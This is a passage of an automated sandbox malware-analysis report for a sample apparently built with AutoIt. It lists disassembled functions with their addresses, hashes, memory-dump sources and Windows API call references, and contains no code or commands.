                                                                                                                                                                  • Instruction ID: e2c8e7dedb99e7930515266a35cf7eaa7a2497e7ebd96f91aa306b63734f8a51
                                                                                                                                                                  • Opcode Fuzzy Hash: 263699aeed138e65ea62b43b4f045f44a857ce7ded7795ced79133f4b88d6354
                                                                                                                                                                  • Instruction Fuzzy Hash: 16619971920116DB8F38AF19C8415EF76E1EB94317B25823BF81892390E6B99FC1C78D
                                                                                                                                                                  Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: N@
                                                                                                                                                                  • API String ID: 0-1509896676
                                                                                                                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                  Function 00442E0C Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                                  • String ID: @uJ
                                                                                                                                                                  • API String ID: 2086374402-1268412911
                                                                                                                                                                  • Opcode ID: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                  • Instruction ID: d38707ff02ce459d0d249ce09c4ef886a5fe37698b82f7f0427e65daa233e585
                                                                                                                                                                  • Opcode Fuzzy Hash: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                  • Instruction Fuzzy Hash: CB21A2335605108BF320CF37CC01652B7E7EBE5310F358A69E4A5973D1DAB96906CB98
                                                                                                                                                                  Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                  Function 0041A217 Relevance: .6, Instructions: 599COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                                                                  • Instruction ID: 15a88e8b99aa9b3b60ae860545546d836dfae57515e83b1227ad377bd0fa8ebd
                                                                                                                                                                  • Opcode Fuzzy Hash: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F327A71D022198BDF24DFA8C4442EEB7B1FF48315F64812BD816AB384D77889D6CB4A
                                                                                                                                                                  Function 00423C81 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                                                                  • Instruction ID: 686ba6e61829bfb5abb72d2d432ff8bdc6c7a847d080576bad96759afb44e414
                                                                                                                                                                  • Opcode Fuzzy Hash: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7922AD31E04269CBCF24CFA9E4443EEB7B1FB54301FA4816BE452AB284D73C4986CB19
                                                                                                                                                                  Function 004119E3 Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                                                                  • Instruction ID: 44b7915538c551888a86dac3e56f37fa477da10fc21367d4c66a1e105d7851d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A029033D497B24B8B710FF944D02B77EA05E0179031F46AADEC07F2A6C21AED5696E4
                                                                                                                                                                  Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                                  Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                                                  Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                                                  Function 00411E78 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                  • Instruction ID: 1be110723fa64262e89d0aec0a1a20255c1bae91910aebb39a61821022ff9223
                                                                                                                                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 55B1B533D0A6B3058736836D05582BFFE626E91B8031FC396CDD03F399C62AAD9295D4
                                                                                                                                                                  Function 04403618 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                  • Instruction ID: 3cd21b901a1d62b0ff1b6198bab91fbbe9e939bcb37b6ba194e8744c2cf30851
                                                                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                  • Instruction Fuzzy Hash: DC41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                                                                  Function 04403508 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                  • Instruction ID: 4f1f998c245fb4e1f2f4a21d7f77f555b01277c68c8b90a499beec6637b0ff82
                                                                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 25019278A00209EFCB44DF98C5909AEFBB5FB88310F2085AADC09A7741D730EE51DB80
                                                                                                                                                                  Function 044034A8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                  • Instruction ID: 60b33de278765cdc113281a9240d42ca3eb1fcb20f26b3fd317365ce4cc5afec
                                                                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                  • Instruction Fuzzy Hash: BD019674A00109EFCB54DF98C5909AEFBB5FB48310F2085AADC0597741D731AE51DB80
                                                                                                                                                                  Function 04401EB8 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                  Function 004594E9 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
